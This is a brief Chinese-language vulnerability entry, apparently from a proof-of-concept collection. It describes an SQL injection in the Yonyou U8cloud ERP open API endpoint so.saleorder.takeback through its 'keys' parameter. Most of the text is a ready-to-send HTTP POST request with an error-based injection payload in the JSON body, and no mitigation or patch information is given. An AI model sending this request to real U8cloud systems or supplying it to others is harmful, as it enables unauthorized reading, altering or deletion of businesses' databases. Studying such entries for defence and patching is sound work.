用友U8cloud是一款面向成长型企业的云ERP管理软件。其开放接口 /u8cloud/openapi/so.saleorder.takeback 在接收和处理用户输入的 keys参数时，未对输入内容进行充分的过滤和校验，导致攻击者能够构造恶意的SQL语句并注入到数据库查询中。成功利用此漏洞的攻击者可以执行非授权的数据库操作，从而窃取、篡改或删除存储在数据库中的业务敏感信息，对企业的核心数据资产构成严重威胁。 POST /u8cloud/openapi/so.saleorder.takeback?appcode=huo&isEncrypt=N HTTP/1.1 Host: Content-Type: application/json Content-Length: 109 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Connection: close Accept-Encoding: gzip { "pk_proposer": "1", "operator": "1", "pk_corp": "1", "keys": ["1'and 1=@@VERSION--"] }

用友U8cloud